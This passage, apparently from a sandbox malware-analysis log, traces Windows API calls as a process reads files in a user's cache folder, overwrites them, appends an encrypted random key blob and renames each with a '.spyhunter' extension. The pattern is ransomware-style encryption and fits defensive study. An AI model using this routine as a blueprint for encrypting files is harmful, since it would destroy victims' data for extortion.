lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ecf4*=0x18e, lpOverlapped=0x0) returned 1 [0151.860] GetProcessHeap () returned 0x2c0000 [0151.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.860] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.861] WriteFile (in: hFile=0x178, lpBuffer=0x57ed34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x57ed34*, lpNumberOfBytesWritten=0x57ecf4*=0x4, lpOverlapped=0x0) returned 1 [0151.861] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecf4*=0x30, lpOverlapped=0x0) returned 1 [0151.861] CloseHandle (hObject=0x178) returned 1 [0151.861] GetProcessHeap () returned 0x2c0000 [0151.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.861] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.spyhunter") returned 162 [0151.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.spyhunter")) returned 1 [0151.862] GetProcessHeap () returned 0x2c0000 [0151.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.862] GetProcessHeap () returned 0x2c0000 [0151.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.862] GetProcessHeap () returned 0x2c0000 [0151.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1de50 | out: hHeap=0x2c0000) returned 1 [0151.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed38 | out: pbBuffer=0x57ed38) returned 1 [0151.862] GetProcessHeap () returned 0x2c0000 [0151.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.862] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed30*=0x30) returned 1 [0151.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.862] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 119 [0151.863] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".txt") returned 0x0 [0151.863] GetProcessHeap () returned 0x2c0000 [0151.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.863] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ecf4*=0xf4, lpOverlapped=0x0) returned 1 [0151.869] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.869] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ecf4*=0xf4, lpOverlapped=0x0) returned 1 [0151.869] GetProcessHeap () returned 0x2c0000 [0151.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.869] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.869] WriteFile (in: hFile=0x178, lpBuffer=0x57ed34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x57ed34*, lpNumberOfBytesWritten=0x57ecf4*=0x4, lpOverlapped=0x0) returned 1 [0151.870] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecf4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecf4*=0x30, lpOverlapped=0x0) returned 1 [0151.870] CloseHandle (hObject=0x178) returned 1 [0151.870] GetProcessHeap () returned 0x2c0000 [0151.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.870] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.spyhunter") returned 129 [0151.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad.spyhunter")) returned 1 [0151.871] GetProcessHeap () returned 0x2c0000 [0151.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.871] GetProcessHeap () returned 0x2c0000 [0151.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.871] GetProcessHeap () returned 0x2c0000 [0151.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7ee8 | out: hHeap=0x2c0000) returned 1 [0151.871] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed30 | out: pbBuffer=0x57ed30) returned 1 [0151.871] GetProcessHeap () returned 0x2c0000 [0151.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.871] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed28*=0x30) returned 1 [0151.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 152 [0151.872] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".txt") returned 0x0 [0151.872] GetProcessHeap () returned 0x2c0000 [0151.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.872] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ecec*=0x18e, lpOverlapped=0x0) returned 1 [0151.873] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.873] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ecec*=0x18e, lpOverlapped=0x0) returned 1 [0151.874] GetProcessHeap () returned 0x2c0000 [0151.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.874] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.874] WriteFile (in: hFile=0x178, lpBuffer=0x57ed2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x57ed2c*, lpNumberOfBytesWritten=0x57ecec*=0x4, lpOverlapped=0x0) returned 1 [0151.874] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecec*=0x30, lpOverlapped=0x0) returned 1 [0151.875] CloseHandle (hObject=0x178) returned 1 [0151.875] GetProcessHeap () returned 0x2c0000 [0151.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.875] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.spyhunter") returned 162 [0151.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.spyhunter")) returned 1 [0151.876] GetProcessHeap () returned 0x2c0000 [0151.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.876] GetProcessHeap () returned 0x2c0000 [0151.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.876] GetProcessHeap () returned 0x2c0000 [0151.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fbc8 | out: hHeap=0x2c0000) returned 1 [0151.876] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed30 | out: pbBuffer=0x57ed30) returned 1 [0151.876] GetProcessHeap () returned 0x2c0000 [0151.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.876] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed28*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed28*=0x30) returned 1 [0151.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0151.877] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 152 [0151.877] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".txt") returned 0x0 [0151.877] GetProcessHeap () returned 0x2c0000 [0151.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.877] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ecec*=0x190, lpOverlapped=0x0) returned 1 [0151.878] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.878] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ecec*=0x190, lpOverlapped=0x0) returned 1 [0151.878] GetProcessHeap () returned 0x2c0000 [0151.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.878] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.879] WriteFile (in: hFile=0x178, lpBuffer=0x57ed2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x57ed2c*, lpNumberOfBytesWritten=0x57ecec*=0x4, lpOverlapped=0x0) returned 1 [0151.879] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecec, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecec*=0x30, lpOverlapped=0x0) returned 1 [0151.879] CloseHandle (hObject=0x178) returned 1 [0151.879] GetProcessHeap () returned 0x2c0000 [0151.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.879] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.spyhunter") returned 162 [0151.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.spyhunter")) returned 1 [0151.880] GetProcessHeap () returned 0x2c0000 [0151.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.880] GetProcessHeap () returned 0x2c0000 [0151.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0151.880] GetProcessHeap () returned 0x2c0000 [0151.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f239e0 | out: hHeap=0x2c0000) returned 1 [0151.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed28 | out: pbBuffer=0x57ed28) returned 1 [0151.880] GetProcessHeap () returned 0x2c0000 [0151.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0151.880] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed20*=0x30) returned 1 [0151.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 152 [0152.068] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".txt") returned 0x0 [0152.069] GetProcessHeap () returned 0x2c0000 [0152.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.069] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ece4*=0x194, lpOverlapped=0x0) returned 1 [0152.074] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.081] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x57ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ece4*=0x194, lpOverlapped=0x0) returned 1 [0152.081] GetProcessHeap () returned 0x2c0000 [0152.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.081] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.081] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ece4, lpOverlapped=0x0 | out: lpBuffer=0x57ed24*, lpNumberOfBytesWritten=0x57ece4*=0x4, lpOverlapped=0x0) returned 1 [0152.082] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ece4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ece4*=0x30, lpOverlapped=0x0) returned 1 [0152.082] CloseHandle (hObject=0xb0) returned 1 [0152.082] GetProcessHeap () returned 0x2c0000 [0152.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0152.082] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.spyhunter") returned 162 [0152.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.spyhunter")) returned 1 [0152.083] GetProcessHeap () returned 0x2c0000 [0152.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0152.083] GetProcessHeap () returned 0x2c0000 [0152.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.083] GetProcessHeap () returned 0x2c0000 [0152.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f23858 | out: hHeap=0x2c0000) returned 1 [0152.084] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed28 | out: pbBuffer=0x57ed28) returned 1 [0152.084] GetProcessHeap () returned 0x2c0000 [0152.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.084] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed20*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed20*=0x30) returned 1 [0152.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.097] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 152 [0152.097] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".txt") returned 0x0 [0152.097] GetProcessHeap () returned 0x2c0000 [0152.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.097] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ece4*=0x190, lpOverlapped=0x0) returned 1 [0152.098] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.098] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x57ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ece4*=0x190, lpOverlapped=0x0) returned 1 [0152.098] GetProcessHeap () returned 0x2c0000 [0152.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.099] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.099] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ece4, lpOverlapped=0x0 | out: lpBuffer=0x57ed24*, lpNumberOfBytesWritten=0x57ece4*=0x4, lpOverlapped=0x0) returned 1 [0152.099] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ece4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ece4*=0x30, lpOverlapped=0x0) returned 1 [0152.099] CloseHandle (hObject=0xb0) returned 1 [0152.099] GetProcessHeap () returned 0x2c0000 [0152.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0152.099] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: 